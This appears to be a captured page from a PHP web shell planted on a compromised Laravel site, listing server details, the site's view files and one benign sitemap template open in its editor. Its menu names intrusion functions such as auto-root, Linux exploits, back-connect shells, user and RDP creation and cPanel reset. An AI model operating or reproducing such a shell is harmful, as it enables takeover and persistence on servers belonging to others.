Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.155.29
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
828
B
-rw-r--r--
beat_my_quote.blade.php
11.37
KB
-rw-r--r--
blogs.blade.php
4.63
KB
-rw-r--r--
category_products.blade.php
49.93
KB
-rw-r--r--
contact_us.blade.php
9.4
KB
-rw-r--r--
custom_printed_boxes.blade.php
57.52
KB
-rw-r--r--
dashboard.blade.php
4.07
KB
-rw-r--r--
faqs.blade.php
3.86
KB
-rw-r--r--
imagesitemap.blade.php
1.89
KB
-rw-r--r--
index.blade.php
17.49
KB
-rw-r--r--
index_old.blade.php
9.71
KB
-rw-r--r--
latest_offers.blade.php
58.09
KB
-rw-r--r--
personalized_packaging_boxes.b...
6.48
KB
-rw-r--r--
portfolio.blade.php
2.29
KB
-rw-r--r--
post.blade.php
1.32
KB
-rw-r--r--
privacy_security.blade.php
829
B
-rw-r--r--
product_detail.blade.php
110.85
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
sitemap.blade.php
5.96
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
760
B
-rw-r--r--
thank_you.blade.php
1.12
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : imagesitemap.blade.php
<?php use App\Models\Page; use App\Models\Category; use App\Models\Product; use App\Models\ProductGallery; use App\Models\Blog; $urls =[]; $result = Product::where('is_site_map',1)->with(['product_gallery'])->get(); foreach ($result as $item) { $link5 = asset('assets/images/products/'.$item->product_image); $obj = new stdClass(); $obj->link = $link5; $obj->modified = $item->modified; $obj->created = $item->created; array_push($urls,$obj); } foreach ($result as $item) { $link5 = asset('assets/images/products/'.$item->product_back_image); $obj = new stdClass(); $obj->link = $link5; $obj->modified = $item->modified; $obj->created = $item->created; array_push($urls,$obj); } $product =Product::where('is_site_map',1)->with(['product_images'])->get(); foreach ($product as $item) { foreach ($item->product_images as $k=>$gallery) { $link5 = asset('assets/images/products_gallery/'.$gallery->image); $obj = new stdClass(); $obj->link = $link5; $obj->modified = $item->modified; $obj->created = $item->created; array_push($urls,$obj); } } ?> <?xml version="1.0" encoding="UTF-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:image="https://www.google.com/schemas/sitemap-image/1.1"> <?php foreach($urls as $item) { $dateFormat = new DateTime(); // this will return current date $date = $dateFormat->format(DateTime::ATOM); if (trim($item->modified) != null) { $tem = DateTime::createFromFormat('Y-m-d H:i:s', $item->modified); $date = $tem->format(DateTime::ATOM); }else if(trim($item->created) != null) { $tem = DateTime::createFromFormat('Y-m-d H:i:s', $item->created); $date = $tem->format(DateTime::ATOM); }?> <url> <image:image> <image:loc>{{$item->link}}</image:loc> </image:image> </url> <?php } echo "</urlset>"; ?>
Close